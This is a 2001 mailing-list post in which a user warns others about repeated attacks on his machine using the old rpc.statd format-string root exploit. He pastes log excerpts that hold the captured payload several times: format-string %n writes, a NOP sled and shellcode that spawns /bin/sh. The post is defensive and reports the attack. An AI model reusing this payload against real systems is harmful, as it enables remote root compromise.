Hi All,

Sorry for off-topic message, but I saw that the security issues
appear quite often on this list.
I saw for last few months strange messages in my system logs.
It seemed that someone regularly tries to utilize the old
"rpc.statd root exploit" to get root account on my box.
I've set the appropriate traps and this is the result of last two days:

Unusual System Events
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D
Dec 30 07:27:08 ipebio15=20
Dec 30 07:27:08 ipebio15 /sbin/rpc.statd[381]: gethostbyname error for ^X=
=F7=FF=BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF=
^[=F7=FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220
Dec 30 07:27:08 ipebio15 =C7^F/bin=C7F^D/shA0=C0\210F^G\211v^L\215V^P\215N^=
L\211=F3=B0^K=CD\200=B0^A=CD\200=E8\177=FF=FF=FF
Dec 30 07:27:08 ipebio15 kernel: Packet log: input ACCEPT eth0 PROTO=3D17 2=
11.171.146.118:740 194.29.161.106:982 L=3D1104 S=3D0x00 I=3D50521 F=3D0x000=
0 T=3D45 (#1)
Dec 30 07:52:44 ipebio15=20
Dec 30 07:52:44 ipebio15 /sbin/rpc.statd[381]: gethostbyname error for ^X=
=F7=FF=BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF=
^[=F7=FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220
Dec 30 07:52:44 ipebio15 =C7^F/bin=C7F^D/shA0=C0\210F^G\211v^L\215V^P\215N^=
L\211=F3=B0^K=CD\200=B0^A=CD\200=E8\177=FF=FF=FF
Dec 30 07:52:44 ipebio15 kernel: Packet log: input ACCEPT eth0 PROTO=3D17 2=
11.171.146.118:960 194.29.161.106:982 L=3D1104 S=3D0x00 I=3D51039 F=3D0x000=
0 T=3D45 (#1)

Unusual System Events
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D
Dec 30 17:05:11 ipebio15=20
Dec 30 17:05:11 ipebio15 /sbin/rpc.statd[381]: gethostbyname error for ^X=
=F7=FF=BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF=
^[=F7=FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220
Dec 30 17:05:11 ipebio15 =C7^F/bin=C7F^D/shA0=C0\210F^G\211v^L\215V^P\215N^=
L\211=F3=B0^K=CD\200=B0^A=CD\200=E8\177=FF=FF=FF
Dec 30 17:05:11 ipebio15 kernel: Packet log: input ACCEPT eth0 PROTO=3D17 2=
11.171.146.118:1017 194.29.161.106:982 L=3D1104 S=3D0x00 I=3D20307 F=3D0x00=
00 T=3D45 (#1)
>=20
> Unusual System Events
> =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D
> Dec 31 06:29:44 ipebio15 kernel: Packet log: input ACCEPT eth0 PROTO=3D17=
 211.171.146.118:632 194.29.161.106:982 L=3D1104 S=3D0x00 I=3D44214 F=3D0x0=
000 T=3D45 (#1)
> Dec 31 06:29:44 ipebio15=20
> Dec 31 06:29:44 ipebio15 syslogd: Cannot glue message parts together
> Dec 31 06:29:44 ipebio15 /sbin/rpc.statd[381]: gethostbyname error for ^X=
=F7=FF=BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF=
^[=F7=FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\2=
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\=
220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220=
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22=
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2=
20\220\220\220\220\220\220\220\220Dec 31 06:29:44 ipebio15 =C7^F/bin=C7F^D/=
shA0=C0\210F^G\211v^L\215V^P\215N^L\211=F3=B0^K=CD\200=B0^A=CD\200=E8\177=
=FF=FF=FF

I've heard, that other users experienced the similar problems.
It seems that a "crazy script kiddie" regularly scans the network looking
for vulnerable systems and trying to break in. Please note, that all
"dangerous" packets came from the privileged port, so either the
211.171.146.118 is compromised, or it's supervisor is a cracker :-(.
I've checked with the traceroute how the hacker's machine is connected to
the Internet and sent the reports to the admins of involved ISP's,
however I'd like to warn all of you as well.=20
--=20

                        Best wishes for New Year 2001
                        Wojciech Zabolotny
                        wzab@ise.pw.edu.pl

--
http://www.piclist.com#nomail Going offline? Don't AutoReply us!
email listserv@mitvma.mit.edu with SET PICList DIGEST in the body